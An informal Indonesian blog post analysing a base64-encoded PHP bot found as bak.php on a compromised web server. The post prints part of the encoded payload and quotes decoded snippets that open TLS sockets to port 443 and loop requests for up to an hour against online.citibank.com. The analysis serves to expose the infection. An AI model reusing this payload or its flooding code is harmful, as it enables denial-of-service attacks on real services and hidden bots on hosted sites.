report ini datang dari teman saya dengan keluhan bahwa server mereka memakan resource besar.
setelah di telusuri script yang memakan resource besar itu adalah terdapat di dalam salah satu domain dan script php
yang berektensi bak.php. setelah di bukak ternyata script itu berisi php yang di enkripsi dengan enkrispi base64
berikut salah satu isinya:

c_id=QHNldF90aW1lX2xpbWl0KDApOw0KQGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIGh5YnNodXQoKXsNCglAdW5saW5rKHdyaXRhYmxlZGlyKCkuIi9sb2NrIi4iOTAxYTQ4Y2Q4MzE4Y2RlZjVlZjg4YjI4MDEwZTk5MTgiKTsNCn0NCmZ1bmN0aW9uIHdyaXRyZWUoKXsNCgkkcGF0aCA9ICIiOw0KCWlmICghaXNzZXQoJF9TRVJWRVJbIkRPQ1VNRU5UX1JPT1QiXSkpDQoJCSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0gPSBzdWJzdHIoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdLCAwLCAtc3RybGVuKCRfU0VSVkVSWyJTQ1JJUFRfTkFNRSJdKSk7DQoJJHN0YWNrW10gPSAkX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOw0KCXdoaWxlICgkc3RhY2spIHsNCgkJJHRoaXNkaXIgPSBhcnJheV9wb3AoJHN0YWNrKTsNCgkJaWYgKCRkaXJjb250ID0gc2NhbmRpcigkdGhpc2RpcikpIHsNCgkJCSRpPTA7DQoJCQl3aGlsZSAoaXNzZXQoJGRpcmNvbnRbJGldKSkgew0KCQkJCWlmICgkZGlyY29udFskaV0gIT09ICIuIiAmJiAkZGlyY29udFskaV0gIT09ICIuLiIpIHsNCgkJCQkJJGN1cnJlbnRfZmlsZSA9ICJ7JHRoaXNkaXJ9L3skZGlyY29udFskaV19IjsNCgkJCQkJaWYgKGlzX2RpcigkY3VycmVudF9maWxlKSl7DQoJCQkJCQkkc3RhY2tbXSA9ICRjdXJyZW50X2ZpbGU7DQoJCQkJCQlpZihAaXNfd3JpdGFibGUoJGN1cnJlbnRfZmlsZSkpew0KCQkJCQkJCXJldHVybiAkY3VycmVudF9maWxlOw0KfQ0KfQ0KfQ0KCQkJCSRpKys7DQp9DQp9DQp9DQoJcmV0dXJuIGZhbHNlOw0KfQ0KZnVuY3Rpb24gd3JpdGFibGVkaXIoKXsNCmlmKCFmdW5jdGlvbl9leGlzdHMoInN5c19ndF90ZW1wX2RpciIpKXsNCmlmKCFlbXB0eSgkX0VOVlsiVE1QIl0pIGFuZCBAaXNfd3JpdGFibGUoJF9FTlZbIlRNUCJdKSkNCglyZXR1cm4gcmVhbHBhdGgoJF9FTlZbIlRNUCJdKTsNCmVsc2VpZighZW1wdHkoJF9FTlZbIlRNUERJUiJdKSBhbmQgQGlzX3dyaXRhYmxlKCRfRU5WWyJUTVBESVIiXSkpDQoJcmV0dXJuIHJlYWxwYXRoKCRfRU5WWyJUTVBESVIiXSk7DQplbHNlaWYoIWVtcHR5KCRfRU5WWyJURU1QIl0pIGFuZCBAaXNfd3JpdGFibGUoJF9FTlZbIlRFTVAiXSkpDQoJcmV0dXJuIHJlYWxwYXRoKCRfRU5WWyJURU1QIl0pOw0KZWxzZXsNCiRkaXIgPSB3cml0cmVlKCk7DQppZigkZGlyID09ISBmYWxzZSkNCglyZXR1cm4gJGRpcjsNCiR0ZW1wX2ZpbGU9dGVtcG5hbShtZDUodW5pcWlkKHJhbmQoKSxUUlVFKSksIiIpOw0KaWYoJHRlbXBfZmlsZSl7DQoJJHRlbXBfZGlyPXJlYWxwYXRoKGRpcm5hbWUoJHRlbXBfZmlsZSkpOw0KCUB1bmxpbmsoJHRlbXBfZmlsZSk7DQoJcmV0dXJuICR0ZW1wX2RpcjsNCn1lbHNlew0KCXJldHVybiBmYWxzZTsNCn0NCn0NCn1lbHNlew0KCXJldHVybiBzeXNfZ2V0X3RlbXBfZGlyKCk7DQp9DQp9DQpmdW5jdGlvbiBmb3JraWxsKCl7DQoJaWYoZmlsZV9leGlzdHMod3JpdGFibGVkaXIoKS4iL2tpbGwiLiI5MDFhNDhjZDgzMThjZGVmNWVmODhiMjgwMTBlOTkxOCIpKXsNCgkJJGZuID0gd3JpdGFibGVkaXIoKS4iL2tpbGwiLiI5MDFhNDhjZDgzMThjZGVmNWVmODhiMjgwMTBlOTkxOCI7DQoJCSRsY29udGVudCA9IGV4cGxvZGUoJy0nLGltcGxvZGUoJycsQGZpbGUoJGZuKSkpOw0KCQlpZigkbGNvbnRlbnRbMV0gPCAkX1JFUVVFU1RbImtzZXNzIl0pIHsNCgkJCUB1bmxpbmsod3JpdGFibGVkaXIoKS4iL2tpbGwiLiI5MDFhNDhjZDgzMThjZGVmNWVmODhiMjgwMTBlOTkxOCIpOw0KfQ0KCQllbHNlIGV4aXQ7DQp9DQp9DQpmdW5jdGlvbiBsb2NrKCl7DQoJZm9ya2lsbCgpOw0KCSR0aW1lID0gdGltZSgpOw0KCSRmbiA9IHdyaXRhYmxlZGlyKCkuIi9sb2NrIi4iOTAxYTQ4Y2Q4MzE4Y2RlZjVlZjg4YjI4MDEwZTk5MTgiOw0KCSRsY29udGVudCA9IGV4cGxvZGUoJy0nLGltcGxvZGUoJycsQGZpbGUoJGZuKSkpOw0KCWlmIChjb3VudCgkbGNvbnRlbnQpPDIpIHsNCgkJJGZwID0gZm9wZW4oJGZuLCJ3Iik7DQoJCWZ3cml0ZSgkZnAsJHRpbWUuJy0nLiRfUkVRVUVTVFsia3Nlc3MiXSk7DQoJCWZjbG9zZSgkZnApOw0KCQlyZXR1cm4gJGZuOw0KfQ0KCWVsc2VpZigkbGNvbnRlbnRbMV0gPCAkX1JFUVVFU1RbImtzZXNzIl0pew0KCQkkZnAgPSBmb3BlbigkZm4sInciKTsNCgkJZndyaXRlKCRmcCwkdGltZS4nLScuJF9SRVFVRVNUWyJrc2VzcyJdKTsNCgkJZmNsb3NlKCRmcCk7DQp9DQoJZWxzZWlmKCRsY29udGVudFsxXSA%

dan seterusnya… lengkap source disini

setelah di decode ternyata script ini berisi code yang berfungsi untuk request get dan post terhadap salah satu target

setelah usut punya usut. ternyata targetnya adalah online.citibank.com

dengan fungsi looping yang tidak wajar ya itu 3600 time looping :-s

woow bisa jebool nih server kalo tidak cepat di tambal 😀

script ini menggunakan jasa socket pada server untuk penyerangan. dengan serangan terhadap port 443 dari si server taget

$host = $parts['host'];
$port = 443;
$socket = stream_socket_client("tls://".$host.":".$port, $errno, $errstr, 30);
if(!$socket){
}

ada banyak target yang telah terinfection
berikut listnya :D. mungkin salah satunya adalah website anda 😀 hehehe

untung saja server cepat di atasi sehingga tidak sampai membuat down pada server yang telah di inject 😀
hehehehehehhe

untuk lengkapnya source nya ada disini 😀

Untuk code target berikut adalah salah satu codenya

$code = @set_time_limit(3600);
@error_reporting(0);
$url = "https://online.citibank.com/US/Welcome.c";
if(substr($url, 0, 4)!='http')
	$url = 'http://'.$url;
$parts = parse_url($url);
if(!isset($parts['path']) || $parts['path'] == ''){
	$parts['path'] = '/';
	$url .= '/';
}